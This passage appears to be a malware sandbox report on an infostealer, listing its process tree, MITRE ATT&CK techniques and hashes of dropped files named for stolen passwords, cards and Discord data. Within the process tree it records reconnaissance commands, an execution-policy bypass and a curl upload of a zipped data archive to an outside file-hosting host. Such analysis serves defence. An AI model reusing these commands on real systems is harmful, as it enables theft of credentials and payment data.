- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2244
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4044
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3376
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:3140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Qivbhiqt.zip";"
  2⤵
  PID:4364
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Qivbhiqt.zip";
    3⤵
    PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1032
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4324
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4752
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1356
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1468
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4208
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3272
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2800
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5040
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5012
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3276
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4728
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4068
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3680
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3912
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3144
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1220
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2744
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1844
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4540
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3608
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:732
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3960
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:244
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4752
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:856
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-Qivbhiqt\Autofills\Autofills.txt

Filesize
92B

MD5
9985f42c66b05c2bb37a32b11ebc46ef

SHA1
d6748fa5f359007c9c0f869d4a78f6345caa6a4a

SHA256
8035c9f7effd67d0df37b16cd5cdbe55bed549d4b48787a7b323f6474ddca52d

SHA512
5112cf6093eb25f8af08764ece3c9b588054410321f145433836745c8759b5f84b430d4188fb20a8d62565ea3650637ae5a950dd1b61841f3fdb71b4e7ff3b94

Download Submit
C:\ProgramData\Steam\Launcher\EN-Qivbhiqt\Cards\Cards.txt

Filesize
68B

MD5
81c8aa870d7aa615de9b68a8d044d005

SHA1
a366e0fd2914dca0b41f4ed6596bb911f4b025a1

SHA256
32fe5f10fb6af4d714db314b0570f945f6dc2401189596009eb79d5d5c5ef703

SHA512
376847440e77370eddca55b3972e0f6f5e659a98043570ff18af5456c105fac83813776f05d963a1efa2842da0e941403b2da59c845ca2facb64e7e3f07cda91

Download Submit
C:\ProgramData\Steam\Launcher\EN-Qivbhiqt\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Qivbhiqt\Passwords\Passwords.txt

Filesize
76B

MD5
b6f15d039b7fff844897b44e2bd16a0c

SHA1
5cdbcf45867a33d6e2d453f6d6a2566c54f72ef2

SHA256
1b43aa4f80c538b79e576fa045c7ad450b0fe632687444066776f12315b64340

SHA512
c9906a5a05ddc52cbacf51321c0c65af6ca219b036a5b2649ecfdd209c3590d02d2713d28d35568622c4e7ff0462449085d8b971abd9d9576c0dee6023964b34

Download Submit
C:\ProgramData\Steam\Launcher\EN-Qivbhiqt\Serial-Check.txt

Filesize
504B

MD5
a0f949e5552963fa84486cf8aa6b7843

SHA1
8bd5362eda4a30db33507a0909e0210ebb27a622

SHA256
c92d70fb0715dc01ff04c254fd5864b4c01c00bb93fe5932c4510fb899480023

SHA512
f2c87bef87cda62c5ff7d3acbfe05dfd73d24599df74be18f204c589f0eb2b4f358d6031a275d4a45c77ede9f70c48de1e756f86c3425562195cdb0a69b9503b

Download Submit
C:\ProgramData\Steam\Launcher\EN-Qivbhiqt\debug.log

Filesize
1KB

MD5
f5648377c119b4946b8f5aee05b230ba

SHA1
c73531dc260eaa62c42425b445f54d50ad2ce086

SHA256
102deddc30f4f46a723ee5d312125c6d4de51f426cf39104c5fe3bedcea19efd

SHA512
d6abdf9b00ffd581528245bf6128ff90076e9b9c4b03d156354679649f25ec0140ffc137e9d1c0fc6cb029afefb828b2aca8788a76b3f05dcdc62ef54c2891f8

Download Submit
C:\ProgramData\Steam\Launcher\EN-Qivbhiqt\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
19da1b26f897f892f5f05cd446a564a0

SHA1
acdf68e279f281cb18da6c7e2bdfecad3de5608b

SHA256
4ba5bc28cf9a69d34ac9e9972c190c3f9776f32402a6d8e2479619a0dbe684e1

SHA512
fdd36456bc83fa21f9dfe96784b896b2e9a1559f1a6bf3ecec66dfc85223fceaa16352b15546a8a1904bf30d9330008fb26bb0ea90f0b680173f0758f1c1e087

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
